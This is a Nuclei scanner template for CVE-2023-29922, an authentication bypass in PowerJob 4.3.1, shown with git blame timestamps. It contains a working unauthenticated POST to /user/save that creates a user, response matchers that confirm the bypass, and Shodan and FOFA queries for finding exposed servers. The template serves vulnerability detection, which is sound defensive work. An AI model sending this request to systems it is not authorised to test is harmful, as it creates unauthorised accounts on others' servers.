nuclei-templates/http/cves/2023/CVE-2023-29922.yaml

56 lines
1.3 KiB
YAML
Raw Normal View History

2023-04-26 16:25:53 +00:00
id: CVE-2023-29922
info:
name: PowerJob V4.3.1 - Authentication Bypass
author: Co5mos
2023-07-11 19:49:27 +00:00
severity: medium
2023-04-26 16:25:53 +00:00
description: |
PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
reference:
- https://github.com/PowerJob/PowerJob/issues/585
- https://nvd.nist.gov/vuln/detail/CVE-2023-29922
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
2023-04-26 16:25:53 +00:00
cve-id: CVE-2023-29922
cwe-id: CWE-1188
2023-07-11 19:49:27 +00:00
epss-score: 0.00606
cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:*
2023-04-26 16:25:53 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-04-26 19:52:48 +00:00
fofa-query: app="PowerJob"
shodan-query: html:"PowerJob"
2023-07-11 19:49:27 +00:00
vendor: powerjob
product: powerjob
2023-04-26 16:25:53 +00:00
tags: cve,cve2023,auth-bypass,powerjob
variables:
str: "{{rand_base(6)}}"
http:
2023-04-26 16:25:53 +00:00
- raw:
- |
POST /user/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-04-26 19:52:48 +00:00
- '"success":true'
- '"data":null'
condition: and
2023-04-26 16:25:53 +00:00
2023-04-26 19:49:04 +00:00
- type: word
2023-04-26 16:25:53 +00:00
part: header
words:
- "application/json"
- type: status
status:
- 200